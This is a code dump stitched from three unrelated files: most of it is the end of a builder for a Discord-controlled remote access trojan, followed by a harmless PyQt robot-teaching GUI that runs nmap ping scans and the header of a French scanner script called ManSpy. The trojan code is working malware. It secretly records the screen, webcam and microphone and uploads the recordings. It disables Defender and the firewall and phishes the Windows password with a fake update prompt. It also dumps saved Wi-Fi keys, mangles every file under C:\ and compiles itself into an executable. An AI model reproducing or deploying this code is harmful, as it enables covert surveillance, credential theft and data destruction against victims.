ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.wintypes.DWORD()))
if message.content == "!currentdir":
import subprocess as sp
output = sp.getoutput('cd')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!displaydir":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("dir", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output22.txt"):
os.system(r"del %temp%\output22.txt /f")
f1 = open(temp + r"\output22.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output22.txt", filename="output22.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content == "!dateandtime":
import subprocess as sp
output = sp.getoutput(r'echo time = %time%% date = %%date%')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!listprocess":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("tasklist", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output.txt"):
os.system(r"del %temp%\output.txt /f")
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content.startswith("!prockill"):
import os
proc = message.content[10:]
kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f"
import time
import os
import subprocess
os.system(kilproc)
import subprocess
time.sleep(2)
process_name = proc
call = 'TASKLIST', '/FI', 'imagename eq %%s' % process_name
output = subprocess.check_output(call).decode()
last_line = output.strip().split('\\r\\n')[-1]
done = (last_line.lower().startswith(process_name.lower()))
if done == False:
await message.channel.send("[*] Command successfuly executed")
elif done == True:
await message.channel.send('[*] Command did not exucute properly')
if message.content.startswith("!recscreen"):
import cv2
import numpy as np
import pyautogui
reclenth = float(message.content[10:])
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
if input3 >= reclenth:
break
else:
continue
import os
SCREEN_SIZE = (1920, 1080)
fourcc = cv2.VideoWriter_fourcc(*"XVID")
temp = (os.getenv('TEMP'))
videeoo = temp + r"\output.avi"
out = cv2.VideoWriter(videeoo, fourcc, 20.0, (SCREEN_SIZE))
counter = 1
while True:
counter = counter + 1
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
if counter >= input2:
break
out.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.avi"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.avi /f")
else:
file = discord.File(check, filename="output.avi")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.avi /f")
if message.content.startswith("!reccam"):
import cv2
import numpy as np
import pyautogui
input1 = float(message.content[8:])
import cv2
import os
temp = (os.getenv('TEMP'))
vid_capture = cv2.VideoCapture(0)
vid_cod = cv2.VideoWriter_fourcc(*'XVID')
loco = temp + r"\output.mp4"
output = cv2.VideoWriter(loco, vid_cod, 20.0, (640,480))
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
ret,frame = vid_capture.read()
output.write(frame)
if input3 >= input1:
break
else:
continue
vid_capture.release()
output.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.mp4"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.mp4 /f")
else:
file = discord.File(check, filename="output.mp4")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.mp4 /f")
if message.content.startswith("!recaudio"):
import cv2
import numpy as np
import pyautogui
import os
import sounddevice as sd
from scipy.io.wavfile import write
seconds = float(message.content[10:])
temp = (os.getenv('TEMP'))
fs = 44100
laco = temp + r"\output.wav"
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write(laco, fs, myrecording)
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.wav"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.wav /f")
else:
file = discord.File(check, filename="output.wav")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.wav /f")
if message.content.startswith("!delete"):
global statue
import time
import subprocess
import os
instruction = message.content[8:]
instruction = "del " + '"' + instruction + '"' + " /F"
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
global statue
statue = "ok"
if statue:
numb = len(result)
if numb > 0:
await message.channel.send("[*] an error has occurred")
else:
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
statue = None
if message.content == "!disableantivirus":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import subprocess
instruction = \""" REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /I /C:"CurrentBuildnumber" \"""
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
done = result.split()
boom = done[2:]
if boom <= ['17763']:
os.system(r"Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet")
await message.channel.send("[*] Command successfuly executed")
elif boom >= ['18362']:
os.system(r\"""powershell Add-MpPreference -ExclusionPath "C:\\\\" \""")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] An unknown error has occurred")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!disablefirewall":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
os.system(r"NetSh Advfirewall set allprofiles state off")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content.startswith("!audio"):
import os
temp = (os.getenv("TEMP"))
temp = temp + r"\audiofile.wav"
if os.path.isfile(temp):
delelelee = "del " + temp + r" /f"
os.system(delelelee)
temp1 = (os.getenv("TEMP"))
temp1 = temp1 + r"\sounds.vbs"
if os.path.isfile(temp1):
delelee = "del " + temp1 + r" /f"
os.system(delelee)
await message.attachments[0].save(temp)
temp2 = (os.getenv("TEMP"))
f5 = open(temp2 + r"\sounds.vbs", 'a')
result = \""" Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX"): oPlayer.URL = \""" + '"' + temp + '"' \""": oPlayer.controls.play: While oPlayer.playState <> 1 WScript.Sleep 100: Wend: oPlayer.close \"""
f5.write(result)
f5.close()
os.system(r"start %temp%\sounds.vbs")
await message.channel.send("[*] Command successfuly executed")
#if adding startup n stuff this needs to be edited to that
if message.content == "!selfdestruct": #prob beter way to do dis
import inspect
import os
import sys
import inspect
uncritproc()
cmd2 = inspect.getframeinfo(inspect.currentframe()).filename
hello = os.getpid()
bat = \"""@echo off\""" + " & " + "taskkill" + r" /F /PID " + str(hello) + " &" + " del " + '"' + cmd2 + '"' + r" /F" + " & " + r\"""start /b "" cmd /c del "%~f0"& taskkill /IM cmd.exe /F &exit /b\"""
temp = (os.getenv("TEMP"))
temp5 = temp + r"\delete.bat"
if os.path.isfile(temp5):
delelee = "del " + temp5 + r" /f"
os.system(delelee)
f5 = open(temp + r"\delete.bat", 'a')
f5.write(bat)
f5.close()
os.system(r"start /min %temp%\delete.bat")
if message.content == "!windowspass":
import sys
import subprocess
import os
cmd82 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
cmd92 = 'echo $cred.getnetworkcredential().password;'
full_cmd = 'Powershell "{} {}"'.format(cmd82,cmd92)
instruction = full_cmd
def shell():
output = subprocess.run(full_cmd, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("password user typed in is: " + result)
if message.content == "!displayoff":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
WM_SYSCOMMAND = 274
HWND_BROADCAST = 65535
SC_MONITORPOWER = 61808
ctypes.windll.user32.BlockInput(True)
ctypes.windll.user32.SendMessageW(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!displayon":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
from pynput.keyboard import Key, Controller
keyboard = Controller()
keyboard.press(Key.esc)
keyboard.release(Key.esc)
keyboard.press(Key.esc)
keyboard.release(Key.esc)
ctypes.windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!hide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib +h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
if message.content == "!unhide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib -h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
#broken. might fix if someone want me too.
if message.content == "!decode" or message.content == "!encode":
import os
import base64
def encode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
encodedBytes = base64.b64encode(data)
os.remove(file)
file = file + '.rip'
t = open(file, "w+")
encodedBytes = encodedBytes.decode("utf-8")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
decodedBytes = base64.b64decode(data)
os.remove(file)
file = file.replace('.rip', '')
t = open(file, "w+")
decodedBytes = decodedBytes.decode("utf-8")
t.write(decodedBytes)
t.close()
parentDirectory = 'C:\\\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if message.content == "!encode":
encode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == ('!decode') and full_path.endswith('.rip'):
decode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!ejectcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door open', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!retractcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door closed', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!critproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
critproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content == "!uncritproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
uncritproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content.startswith("!website"):
import subprocess
website = message.content[9:]
def OpenBrowser(URL):
if not URL.startswith('http'):
URL = 'http://' + URL
subprocess.call('start ' + URL, shell=True)
OpenBrowser(website)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!distaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statuuusss
import time
statuuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statuuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
import winreg as reg
reg.CreateKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
else:
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!enbtaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statusuusss
import time
statusuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statusuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
await message.channel.send("[*] Command successfuly executed")
else:
import winreg as reg
reg.DeleteKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!getwifipass":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import os
import subprocess
import json
x = subprocess.run("NETSH WLAN SHOW PROFILE", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
x = x[x.find("User profiles\\r\\n-------------\\r\\n")+len("User profiles\\r\\n-------------\\r\\n"):len(x)].replace('\\r\\n\\r\\n"',"").replace('All User Profile', r'"All User Profile"')[4:]
lst = []
done = []
for i in x.splitlines():
i = i.replace('"All User Profile" : ',"")
b = -1
while True:
b = b + 1
if i.startswith(" "):
i = i[1:]
if b >= len(i):
break
lst.append(i)
lst.remove('')
for e in lst:
output = subprocess.run('NETSH WLAN SHOW PROFILE "' + e + '" KEY=CLEAR ', stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
for i in output.splitlines():
if i.find("Key Content") != -1:
ok = i[4:].replace("Key Content : ","")
break
almoast = '"' + e + '"' + ":" + '"' + ok + '"'
done.append(almoast)
await message.channel.send("[*] Command successfuly executed")
await message.channel.send(done)
else:
await message.channel.send("[*] This command requires admin privileges")
client.run(token)""".replace("~~TOKENHERE~~", tokenbot))
except Exception as e:
print(f"""\n\n\n\n{y}[{Fore.LIGHTRED_EX }!{y}]{w} Error writing file: {e}""")
os.system(2)
os.system('cls')
main()
print(f"""\n\n\n{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} File has been correctly written to "temp/{fileName}.py" """)
convert = input(f"""\n{y}[{w}#{y}]{w} Convert your script into an executable (Y/N) ? """)
if convert == 'Y' or convert == 'y':
time.sleep(1)
os.system('cls')
print(f'{y}[{b}#{y}]{w} File creation...')
time.sleep(1)
# Note! There is an issue with this, see https://github.com/opencv/opencv/issues/14064 if you cannot compile the exe
# To fix this, add --paths to the pyinstaller command, and point to Python39\site-packages\cv2\python-3.9
os.system(f"pyinstaller -y -F -w --distpath temp --specpath temp --workpath temp temp/{fileName}.py")
os.system('cls')
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
time.sleep(1)
os.remove(f"temp/{fileName}.spec")
shutil.rmtree(f"temp/{fileName}")
shutil.rmtree(f"temp/__pycache__")
time.sleep(1)
os.system('cls')
discordrattitle()
print(f"""{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} The executable file has been correctly generated""")
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
else:
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
discordrat()
|
GUI.py
|
from PyQt5 import QtCore, QtGui, uic, QtWidgets
from teachablerobots.src.GridSpace import *
from teachablerobots.src.RobotTracker import *
import sys
import cv2
import numpy as np
import threading
from multiprocessing import Process, Queue, Event
import time
import socket
import subprocess
formXML = uic.loadUiType("/home/tdarrah/Documents/teachablerobots/src/robotGUI1.ui")[0]
class App():
'''The parent application that runs the window and actual GUI'''
def __init__(self):
'''Initializes the application and dependancies.'''
self.app = QtWidgets.QApplication(sys.argv)
self.gs = GridSpace()
self.r = object
self.w = MainWindow(self)
self.w.setWindowTitle("Robot Command Interface")
self.running = False
self.robotIP = "1.1.1.1"
self.problemStage = 0
self.scanned = False
self.updateThread = threading.Thread(target=self.Update)
self.commSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def Run(self):
'''The entry point into the program. This actually calls the Run function
in the MainWindow class.'''
self.w.show()
self.app.exec_()
def Update(self):
'''This handles the gridspace camerafeed, and always updates the gs.frame which
is what is displayed in the app.'''
while(self.running):
if(type(self.r) == Robot):
self.gs.Update(lambda: self.gs.ProcessFrame(self.r.low, self.r.high))
self.r.FindRobot()
self.r.FrameOverlay()
else:
self.gs.Update(lambda: self.gs.ProcessFrame((0,0,0), (180,360,360)))
def ConnectRobot(self):
'''This connects to the robot'''
if(self.problemStage == 0):
if(self.w.colorSelection.currentText() == "robot color"):
QtWidgets.QMessageBox.about(self.w, "Error", "you must select a color first.")
return
if not self.scanned and self.problemStage == 0:
QtWidgets.QMessageBox.about(self.w, "Error", "What is the robots IP address?")
return
print(self.robotIP)
self.w.outputTextBox.setText("attempting to connect...")
self.w.outputTextBox.repaint()
self.commSocket.sendto("start robot".encode("ascii"), (self.robotIP, 6789))
time.sleep(.25)
if(self.problemStage == 0):
self.r = Robot(self.gs, self.w.colorSelection.currentText())
else:
self.r = Robot(self.gs, "green")
self.r.robotServer.allow_reuse_address = True
self.w.r = self.r
self.w.InitSliders()
if(self.r.robotServer.setupLine("") == True):
self.w.connectButton.setText("connected")
self.w.connectButton.setEnabled(False)
self.w.colorSelection.setEnabled(False)
self.w.networkGroupBox.setEnabled(False)
self.w.networkGroupBox.setVisible(False)
self.r.robotComm.start()
self.w.outputTextBox.setText("robot online\n" + str(self.r.robotServer.connection))
for r in self.w.radialButtons:
r.setVisible(False)
self.w.scanNetworkButton.setVisible(False)
self.w.radialSubmitButton.setVisible(False)
self.w.networkLabel.setVisible(False)
self.w.robotIPadrLabel.setText(self.robotIP)
if(self.problemStage == 0):
self.problemStage = 1
else:
self.w.outputTextBox.setText("Couldn't connect to robot.\nCheck the robotIP address.")
self.r.robotServer.connection.close()
return
class MyTextEdit(QtWidgets.QTextEdit, QtWidgets.QGroupBox):
'''reimplement text edit class to override keyPressEvent to capture the enter key.'''
def __init__(self, parent, parent2):
super(MyTextEdit, self).__init__(parent2)
def keyPressEvent(self, event):
super(MyTextEdit, self).keyPressEvent(event)
if(event.key() == QtCore.Qt.Key_Return):
self.parent().parent().parent().SendCommands()
class ImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(ImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class MainWindow(QtWidgets.QMainWindow, formXML):
def __init__(self, parentApp, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
self.setupUi(self)
self.parentApp = parentApp
self.gs = parentApp.gs
self.r = parentApp.r
self.showRange = False
self.window_width = self.AppFeed.frameSize().width()
self.window_height = self.AppFeed.frameSize().height()
self.AppFeed = ImageWidget(self.AppFeed)
self.AppFeedAlt = ImageWidget(self.AppFeedAlt)
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.Run)
self.timer.start(1)
self.colorSelection.addItem("robot color")
self.colorSelection.addItem("green")
self.colorSelection.addItem("pink")
self.colorSelection.addItem("blue")
########################################
##### INPUT #####
########################################
self.InputText = MyTextEdit(QtWidgets.QTextEdit, self.InputGroupBox)
self.InputText.setGeometry(QtCore.QRect(10, 30, 371, 61))
self.InputText.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.InputText.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.InputText.setObjectName("InputText")
########################################
##### BUTTONS #####
########################################
self.showMazeButton.clicked.connect(self.ShowMaze)
self.showWaypointsButton.clicked.connect(self.ShowWaypoints)
self.startButton.clicked.connect(self.Start)
self.textSubmitButton.clicked.connect(self.SendCommands)
self.connectButton.clicked.connect(self.parentApp.ConnectRobot)
self.radialSubmitButton.clicked.connect(self.SetRobotIP)
self.scanNetworkButton.clicked.connect(self.ScanNetwork)
self.rangeSensorButton.clicked.connect(self.StartRangeSensor)
########################################
##### SLIDERS #####
########################################
self.HColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(1))
self.SColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(2))
self.VColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(3))
self.HColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(4))
self.SColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(5))
self.VColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(6))
########################################
##### RADIAL BUTTONS #####
########################################
self.radialButtons = []
self.radialButtons.append(self.radioButton_1)
self.radialButtons.append(self.radioButton_2)
self.radialButtons.append(self.radioButton_3)
self.radialButtons.append(self.radioButton_4)
self.radialButtons.append(self.radioButton_5)
for r in self.radialButtons:
r.setEnabled(False)
########################################
##### CHECK BOXES #####
########################################
self.checkBoxes = []
self.checkBoxes.append(self.checkBox_1)
self.checkBoxes.append(self.checkBox_2)
self.checkBoxes.append(self.checkBox_3)
self.checkBoxes.append(self.checkBox_4)
self.checkBoxes.append(self.checkBox_5)
for c in self.checkBoxes:
c.setVisible(False)
########################################
##### IMG ALGOS #####
########################################
self.imgBoxes = []
self.imgBoxes.append(self.imgAlgorithm_1)
self.imgBoxes.append(self.imgAlgorithm_2)
self.imgBoxes.append(self.imgAlgorithm_3)
self.imgBoxes.append(self.imgAlgorithm_4)
for i in self.imgBoxes:
i.setVisible(False)
return
def StartRangeSensor(self):
self.showRange = True
self.rangeSensorButton.setEnabled(False)
return
def SetRobotIP(self):
for r in self.radialButtons:
if(r.isChecked()):
self.parentApp.robotIP = r.text()
self.robotIPadrLabel.setText(self.parentApp.robotIP)
def ScanNetwork(self):
msgBox = QtWidgets.QMessageBox()
msgBox.setText("which network should we scan?")
msgBox.setWindowTitle("select a network to scan")
msgBox.setDetailedText("To determine your IP address, you can open a browser and go to www.whatismyipaddress.com; alternatively, open a terminal (press ctrl+alt+t) and type in a certain command to determine your computer's IP address...")
msgBox.addButton("192.168.1.0", 0)
msgBox.addButton("10.10.1.0", 0)
msgBox.addButton("129.59.105.0", 0)
self.outputTextBox.setText("scanning...")
res = msgBox.exec_()
if(res == 0):
result = subprocess.check_output(["nmap", "-sn", "192.168.1.0/24"])
for r in self.radialButtons:
r.setEnabled(True)
elif(res == 1):
result = subprocess.check_output(["nmap", "-sn", "10.10.1.0/24"])
else:
result = subprocess.check_output(["nmap", "-sn", "129.59.105.0/24"])
self.outputTextBox.setText(result.decode("ascii"))
self.parentApp.scanned = True
def InitSliders(self):
self.HColorSliderLow.setValue(self.r.low[0])
self.SColorSliderLow.setValue(self.r.low[1])
self.VColorSliderLow.setValue(self.r.low[2])
self.HColorSliderHigh.setValue(self.r.high[0])
self.SColorSliderHigh.setValue(self.r.high[1])
self.VColorSliderHigh.setValue(self.r.high[2])
self.lowRangeLabel.setText("Low Range: " + str(self.r.low))
self.highRangeLabel.setText("High Range: " + str(self.r.high))
pass
def ShowMaze(self):
if(self.gs.showMaze):
self.gs.showMaze = False
else:
self.gs.showMaze = True
def ShowWaypoints(self):
if(self.gs.showWaypoints):
self.gs.showWaypoints = False
else:
self.gs.showWaypoints = True
def UpdateColors(self, val):
if(val == 1):
self.r.low = (int(self.HColorSliderLow.value()), self.r.low[1], self.r.low[2])
if(val == 2):
self.r.low = (self.r.low[0], int(self.SColorSliderLow.value()), self.r.low[2])
if(val == 3):
self.r.low = (self.r.low[0], self.r.low[1], int(self.VColorSliderLow.value()))
if(val == 4):
self.r.high = (int(self.HColorSliderHigh.value()), self.r.high[1], self.r.high[2])
if(val == 5):
self.r.high = (self.r.high[0], int(self.SColorSliderHigh.value()), self.r.high[2])
if(val == 6):
self.r.high = (self.r.high[0], self.r.high[1], int(self.VColorSliderHigh.value()))
self.lowRangeLabel.setText("Low Range: " + str(self.r.low))
self.highRangeLabel.setText("High Range: " + str(self.r.high))
def SendCommands(self):
if(self.r.robotServer.connected):
self.r.SendCommandSequence(self.InputText.toPlainText())
self.commandHistory.setText(self.commandHistory.toPlainText() + self.InputText.toPlainText())
self.InputText.setText("")
def Start(self):
self.parentApp.running = True
self.parentApp.updateThread.start()
self.startButton.setEnabled(False)
self.startButton.setText('Starting...')
self.parentApp.t1 = time.time()
return
def Run(self):
if(self.parentApp.problemStage == 0):
self.problemDescription.setText("Establish a connection with the robot.")
elif(self.parentApp.problemStage == 1):
self.problemDescription.setText("navigate your way through the maze. Use the waypoints and short command sequences.")
elif(self.parentApp.problemStage == 2):
self.problemDescription.setText("Now that the robot can navigate through a virtual " +
"world, it's ready to navigate the real word. But " +
"first, ensure it won't run into any obstacles!\n\n" +
"Check out the range sensor and ensure it works.\n\n" +
"HINT: go to (2,2) and face the wall...")
else:
self.problemDescription.setText("")
if(self.showRange):
self.rangeLabel.setText(str(self.parentApp.r.range.value))
#print(str(self.parentApp.r.range.value))
if(self.parentApp.running):
self.startButton.setText("Camera is live")
if(type(self.r) == Robot):
img = self.r.FrameOverlay()
else:
img = self.gs.frame
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation = cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
h,w,b = self.gs.frameCopy.shape
try:
image1 = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
image2 = QtGui.QImage(self.gs.frameCopy, w, h, (b*w), QtGui.QImage.Format_RGB888)
self.AppFeed.setImage(image1)
self.AppFeedAlt.setImage(image2)
self.locationLabel.setText(str(self.r.location.value.decode('ascii')))
self.directionLabel.setText(str(self.r.direction.value.decode('ascii')))
self.distanceTravelledLabel.setText(str(self.r.distanceTravelled.value))
if(not self.r.mazeFinished and self.r.goalFound == True and self.parentApp.problemStage == 1):
self.outputTextBox.setText("Good Job!!")
self.r.mazeFinished = True
self.r.goalFound = False
self.parentApp.problemStage = 2
self.rangeSensorButton.setEnabled(True)
except Exception as e:
pass
def closeEvent(self, event):
self.parentApp.running = False
if(type(self.r) == Robot):
self.r.SendCommandSequence("Q")
time.sleep(1.2)
self.r._finished = True
self.r.robotServer.e.set()
self.r.robotServer.finished.value = True
if(self.r.robotComm.is_alive()):
self.r.robotComm.e.set()
self.r.robotComm.terminate()
self.r.robotComm.join()
self.r.robotServer.closeConnection()
return
|
manSpyV1.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ____
# __ _ ___ ____ / __/__ __ __
# / ' \/ _ `/ _ \_\ \/ _ \/ // /
#/_/_/_/\_,_/_//_/___/ .__/\_, /
# /_/ /___/
#
# Auteur : Mansour eddih
# Outil : ManSpy
# Usage : ./manspy.py 'exemple.com' (ou) python manspy.py 'exemple.com'.
# La description : cet outil permet de automatiser le processus d'analyse de sécurité à la multitude
# d’outils de sécurité Linux disponibles et certains scripts personnalisés.
# Importer les librairies
import sys
import socket
import subprocess
import os
import time
import signal
import random
import string
import threading
import re
from urlparse import urlsplit
# Temps d'analyse éc..
intervals = (
('h', 3600),
('m', 60),
('s', 1),
)
def display_time(seconds, granularity=3):
result = []
seconds = seconds + 1
